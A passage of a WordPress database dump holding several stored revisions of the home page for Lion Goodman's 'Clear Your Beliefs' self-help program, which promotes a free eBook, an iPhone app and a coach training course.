gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:10:50', '2014-11-06 23:10:50', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1667, 2, '2014-11-06 18:20:53', '2014-11-06 23:20:53', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:20:53', '2014-11-06 23:20:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1666, 2, '2014-11-06 18:18:59', '2014-11-06 23:18:59', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:18:59', '2014-11-06 23:18:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1671, 2, '2014-11-11 18:23:37', '2014-11-11 23:23:37', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">Download the free eBook. </p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:23:37', '2014-11-11 23:23:37', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1670, 2, '2014-11-11 18:08:49', '2014-11-11 23:08:49', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:08:49', '2014-11-11 23:08:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1672, 2, '2014-11-11 18:26:26', '2014-11-11 23:26:26', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:26:26', '2014-11-11 23:26:26', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1673, 2, '2014-11-11 18:32:59', '2014-11-11 23:32:59', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 50px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with 